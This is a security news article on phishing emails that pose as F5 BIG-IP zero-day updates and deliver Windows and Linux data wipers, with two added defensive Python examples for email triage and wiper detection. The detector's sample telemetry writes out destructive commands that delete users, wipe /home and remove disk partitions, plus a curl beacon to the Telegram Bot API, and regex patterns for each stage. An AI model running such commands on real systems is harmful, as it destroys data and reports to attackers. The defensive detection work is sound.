Fake F5 BIG-IP zero-day warning emails push data wipers



The Israel National Cyber Directorate warns of phishing emails pretending to be F5 BIG-IP zero-day security updates that deploy Windows and Linux data wipers.

Israel's National Cyber Directorate (INCD) acts as the CERT responsible for protecting the state from cyber threats and for informing organizations and citizens about known attacks.

Since October, Israel has been heavily targeted by pro-Palestinian and Iranian hacktivists, who have been conducting data theft and data-wiping attacks on organizations in the country.

In November, a new data wiper called BiBi Wiper was discovered that targeted both Linux and Windows devices and is believed to have been created by pro-Hamas hacktivists.

Fake F5 update deploys wiper

Yesterday, INCD warned of a new phishing attack deploying data wipers through emails pretending to be a warning about a zero-day vulnerability in F5 BIG-IP devices.

A pro-Palestinian hacktivist group named Handala told BleepingComputer that they were responsible for the phishing attack, stating it was deployed on many Israeli networks. BleepingComputer has not been able to confirm these claims independently.

The phishing email warns that the F5 BIG-IP zero-day vulnerability is actively exploited in attacks, urging Israeli organizations to download and install a security update before their network is breached.

Phishing email pushing fake F5 BIG-IP update
Source: INCD

For Windows users, the email pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named update.sh [VirusTotal].
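The lure described above combines three signals a mail gateway can score without any sandboxing: a sender domain that is not the vendor's, urgency language about an actively exploited zero-day, and an executable or script attachment posing as the "update". The following triage function is an added example written for this article, not code from INCD, BleepingComputer or F5; the vendor-domain allowlist and the sample message (including its sender address and placeholder attachment bodies) are constructed assumptions, only the attachment filenames come from the article.

```python
"""Triage an inbound "vendor security update" email for the lure pattern in the article."""
import email
import email.policy
import re
from email.message import EmailMessage
from email.utils import parseaddr

# Assumed allowlist of the vendor's sending domains (a local policy choice, not from the article).
VENDOR_DOMAINS = {"f5.com"}

# A vendor advisory should never deliver its fix as an inline executable or script.
EXECUTABLE_SUFFIXES = (".exe", ".sh", ".bat", ".ps1", ".msi", ".scr")

# Pressure phrases typical of this kind of lure.
URGENCY_TERMS = re.compile(r"zero[- ]day|actively exploited|urgent|immediately|before .* breach", re.I)


def build_message(sender: str, subject: str, body: str, attachments: list[tuple[str, str, str]]) -> bytes:
    """Build a constructed test message; attachments are (filename, maintype, subtype) with dummy bodies."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "it-admin@victim.example"
    msg["Subject"] = subject
    msg.set_content(body)
    for filename, maintype, subtype in attachments:
        # Placeholder bytes only: triage keys on the declared filename, not the content.
        msg.add_attachment(b"placeholder", maintype=maintype, subtype=subtype, filename=filename)
    return msg.as_bytes()


def build_sample_message() -> bytes:
    """Constructed sample modelled on the lure in the article (not the real phishing email)."""
    return build_message(
        "F5 Security <security-alert@f5-updates.example>",   # constructed, non-vendor sender
        "URGENT: F5 BIG-IP zero-day actively exploited - install security update",
        "A zero-day in F5 BIG-IP is actively exploited. Install the attached update before your network is breached.",
        [("F5UPDATER.exe", "application", "octet-stream"), ("update.sh", "text", "x-shellscript")],
    )


def triage_message(raw: bytes) -> dict:
    """Return the sender domain, the list of findings, and a verdict: allow / review / quarantine."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    sender_domain = parseaddr(str(msg["From"]))[1].rpartition("@")[2].lower()
    findings = []

    if sender_domain not in VENDOR_DOMAINS:
        findings.append(f"sender domain {sender_domain!r} is not an approved vendor domain")

    body_part = msg.get_body(preferencelist=("plain",))
    text = f"{msg['Subject']}\n{body_part.get_content() if body_part else ''}"
    if URGENCY_TERMS.search(text):
        findings.append("urgency language typical of a lure")

    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(EXECUTABLE_SUFFIXES):
            findings.append(f"executable attachment {name!r}")

    # Any executable "update" attachment is enough to hold the mail; other signals alone go to review.
    if any(f.startswith("executable attachment") for f in findings):
        verdict = "quarantine"
    elif findings:
        verdict = "review"
    else:
        verdict = "allow"
    return {"sender_domain": sender_domain, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for line in triage_message(build_sample_message())["findings"]:
        print("-", line)
```

The attachment check deliberately ignores the attachment body: the article notes both payloads try to look like an F5 installer, so the filename and delivery channel are the reliable signals, and a genuine vendor fix is fetched from the vendor's own site rather than opened from a mailbox.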

When launched, both the Windows and Linux versions attempt to impersonate an F5 security update by displaying the company's logo on the screen.

For example, the Windows wiper will show a small screen branded with the F5 logo that pretends to be a security update installer.

Windows data wiper impersonating F5 security update
Source: BleepingComputer

When the Update button is clicked, the wiper will send a message containing information about the device to a Telegram channel and attempt to wipe all the data from the computer.

However, in BleepingComputer's tests, the wiper is a bit buggy, not deleting all of the data on a computer.

The Linux wiper is a shell script that first downloads the programs necessary to wipe the computer, which are xfsprogs, wipe, and parted.

Linux wiper's data wiping routine
Source: BleepingComputer

These programs are used first to remove all users on the system and then to delete the associated home directories with the 'wipe' command.

The wiper will then attempt to delete all operating system files and the partitions on the Linux device. When done, the Linux machine is rebooted to cause the partition changes to go into effect.

Like the Windows wiper, the Linux version will communicate with a Telegram channel to provide information about the device and status updates.
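The Linux routine described in the last few paragraphs is a fixed sequence of ordinary commands (install the wiping tools, contact Telegram, remove users, wipe home directories, destroy partitions, reboot), none of which is suspicious on its own, so a host detection has to correlate them under one parent script. The following detector is an added example for this article, not code from BleepingComputer or any EDR product: the process-execution events are a constructed sample in an assumed normalised "timestamp pid ppid cmdline" format, `userdel` and a `curl` call to the Telegram Bot API are assumed as the concrete commands behind "remove all users" and "communicate with a Telegram channel", and the second script in the sample is a benign provisioning job included to show that legitimately installing `parted` and relabelling a disk does not trip the rule.

```python
"""Correlate process-execution events into the staged Linux wiper behaviour from the article."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample telemetry (not real logs): "epoch pid ppid cmdline", one execve per line.
SAMPLE_EVENTS = """\
1700000000 4101 4100 /bin/bash ./update.sh
1700000001 4102 4101 apt-get install -y xfsprogs wipe parted
1700000004 4103 4101 curl -s https://api.telegram.org/botTOKEN/sendMessage -d chat_id=123 -d text=started
1700000005 4104 4101 userdel -r alice
1700000006 4105 4101 userdel -r bob
1700000007 4106 4101 wipe -rf /home
1700000010 4107 4101 parted -s /dev/sda rm 1
1700000012 4108 4101 reboot
1700000020 5201 5200 /bin/bash ./provision.sh
1700000021 5202 5201 apt-get install -y parted
1700000022 5203 5201 parted -s /dev/sdb mklabel gpt
"""

# One pattern per stage of the routine; each is harmless alone, the combination is the signal.
STAGES = {
    "install_wipe_tools": re.compile(r"\b(apt(-get)?|yum|dnf|apk)\b.*\binstall\b.*\b(wipe|parted|xfsprogs)\b"),
    "telegram_beacon": re.compile(r"api\.telegram\.org/bot"),          # assumed: Bot API via curl
    "remove_users": re.compile(r"\buserdel\b"),                         # assumed concrete command
    "wipe_home": re.compile(r"\bwipe\b\s+-\S+\s+/home\b"),
    "destroy_partitions": re.compile(r"\bparted\b.*\b(rm|mklabel)\b|\bmkfs\b"),
    "reboot": re.compile(r"\b(reboot|shutdown -r|systemctl reboot)\b"),
}


@dataclass
class Event:
    ts: int
    pid: int
    ppid: int
    cmdline: str


def parse_events(text: str) -> list[Event]:
    """Parse the normalised event format into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ppid, cmdline = line.split(maxsplit=3)
        events.append(Event(int(ts), int(pid), int(ppid), cmdline))
    return events


def detect_wiper_chains(events: list[Event], window: int = 600, min_stages: int = 3) -> list[dict]:
    """Alert on any parent process whose children hit >= min_stages distinct stages within `window` seconds."""
    cmd_by_pid = {e.pid: e.cmdline for e in events}
    hits_by_parent: dict[int, list[tuple[int, str]]] = defaultdict(list)
    for e in events:
        for stage, pattern in STAGES.items():
            if pattern.search(e.cmdline):
                hits_by_parent[e.ppid].append((e.ts, stage))

    alerts = []
    for ppid, hits in hits_by_parent.items():
        hits.sort()
        first_ts = hits[0][0]
        # Window anchored at the parent's first staged command; a wiper runs its stages back to back.
        stages = {stage for ts, stage in hits if ts - first_ts <= window}
        if len(stages) >= min_stages:
            alerts.append({
                "parent_pid": ppid,
                "parent": cmd_by_pid.get(ppid, "<unknown>"),
                "stages": sorted(stages),
                "first_ts": first_ts,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_wiper_chains(parse_events(SAMPLE_EVENTS)):
        print(f"pid {alert['parent_pid']} ({alert['parent']}): {', '.join(alert['stages'])}")
```

The threshold of three distinct stages is a tuning choice: the provisioning job in the sample hits only `install_wipe_tools` and `destroy_partitions`, which is exactly what a disk setup script looks like, while the impersonated updater hits all six. Grouping by parent pid is what makes the rule useful, since the same commands spread across unrelated administrators' shells would not correlate.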

Data wipers have become a massive problem for Israel, with hacktivists commonly using them in destructive attacks to disrupt Israel's operations and economy.

As always, the best defense is to download files from email only if they come from a trusted and confirmed source. Furthermore, security updates should only be downloaded directly from the hardware vendor, not from third-party sites.